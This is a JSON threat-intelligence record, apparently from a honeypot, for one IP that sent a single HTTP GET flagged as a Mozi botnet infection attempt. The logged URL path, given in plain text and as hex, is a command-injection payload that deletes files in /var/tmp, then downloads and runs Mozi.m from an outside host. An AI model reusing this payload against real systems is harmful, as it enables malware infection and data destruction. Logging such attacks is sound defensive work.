{"ip":"43.230.94.187","total_events":1,"verdict":{"verdict":"scanning","label":"Scanning for known vulnerabilities","detail":"1 exploit-path probe(s)","confidence":"medium","network_type":"residential ISP","why":["1 request(s) matched a known exploit path.","Only GET/HEAD seen, no request body: scanning for the vulnerability, not delivering a payload.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"142 bytes sent","bytes_sent":142,"session_seconds":0,"persistent":false}},"first_seen":"2026-08-03T07:40:11","last_seen":"2026-08-03T07:40:11","events_24h":1,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Punjab","city":"Multan","lat":30.2216,"lon":71.4702,"asn":140900,"org":"Getlinks (SMC-Private) Limited"},"source_domain":"static-187-94-230-43.ebonenet.com","known_scanners":[],"scanner_tag":{"key":"peeringdb:as140900","label":"Getlinks","category":"isp","url":"https://www.peeringdb.com/asn/140900"},"cve_matches":[],"malware":[],"top_ports":[{"port":8443,"proto":"tcp","label":"HTTPS-alt","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":2443},"user_agents":[],"timeline":[{"date":"2026-08-03","count":1}],"recent_events":[{"timestamp":"2026-08-03T07:40:11","port":8443,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://43.230.94.187:42391/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m","summary":"","payload_hex":"474554202f6367692d62696e2f3b6364247b4946537d2f7661722f746d703b726d247b4946537d2d7266247b4946537d2a3b247b4946537d77676574247b4946537d687474703a2f2f34332e3233302e39342e3138373a34323339312f4d6f7a692e6d3b247b4946537d7368247b4946537d2f7661722f746d702f4d6f7a692e6d20485454502f312e300d0a0d0a","method":"GET","user_agent":"","ja3":"","session":"9dd224e4-3336-463a-87b9-c6c98157966f","seq":1,"duration_ms":100,"bytes_in":142,"bytes_out":78}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://43.230.94.187:42391/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"Mozi Botnet Infection Attempt","tag_type":"malware","title":"Mozi Botnet Infection Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"Mozi.m","reference_urls":[]}],"data_as_of":"2026-08-04T00:40:32.643760+00:00"}